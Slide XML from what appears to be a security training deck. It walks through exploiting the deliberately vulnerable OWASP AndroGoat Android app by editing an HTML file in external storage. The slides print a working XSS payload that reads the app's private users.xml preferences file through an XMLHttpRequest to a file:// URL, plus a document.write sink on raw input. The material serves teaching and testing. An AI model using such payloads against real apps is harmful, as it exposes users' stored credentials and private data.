              </a:rPr>
              <a:t>/Android/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xss_ext.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the file and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>File: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xss_ext.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">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html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">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body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">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h2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;External Storage&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>h2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>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83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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>displayContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="397300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"name"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="397300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) ; &lt;/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t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"text"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"name"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BC6060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BC6060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BC6060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Hype=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"button"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Display"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> onclick=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>displayContent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> style=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"background-color: black; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>color:white</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; border: 2px solid #000000"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt; &lt;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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'GET'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"file:///data/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/shared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prefs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>users.xml"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="78A960"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();alert(a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>responseText</a:t>
            </a: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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>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body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4A4A4A"/>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028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dirty="0" err="1"/>
              <a:t>After</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> change, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can push the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>again</a:t>
